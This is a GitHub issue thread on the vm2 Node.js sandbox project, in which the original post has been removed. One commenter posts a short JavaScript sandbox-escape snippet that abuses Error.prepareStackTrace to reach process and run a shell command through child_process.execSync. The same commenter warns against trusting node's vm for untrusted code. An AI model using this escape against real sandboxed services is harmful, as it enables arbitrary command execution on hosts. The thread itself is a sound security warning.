patriksimek / vm2

Advanced vm/sandbox for Node.js
MIT License
3.86k stars 293 forks

[content removed for the very unfriendly management] #535

Closed mgttt closed 5 months ago

mgttt commented 5 months ago

[content removed for the very unfriendly management]

j4k0xb commented 5 months ago

That's just the stock node vm 🤔 vm2 did a lot more to prevent escapes, but it still wasn't enough.

bypass:

```js
Error.prepareStackTrace = (e, frames) => {
  frames.constructor
    .constructor("return process")()
    .mainModule.require("child_process")
    .execSync("touch flag");
};
throw new Error();
```

j4k0xb commented 5 months ago

Please don't rely on a few patches or node's vm in general for dealing with untrusted code, it gives a false sense of security and there are countless other ways to bypass (e.g. https://gist.github.com/leesh3288/e4aa7b90417b0b0ac7bcd5b09ac7d3bd)

That's why the readme says:

> Consider migrating your code to isolated-vm.

XmiliaH commented 5 months ago

Your solution does not help, as @j4k0xb showed again and again. Stop asking here what problems your solution still has. It has nothing to do with vm2. Move this discussion over to your own repo.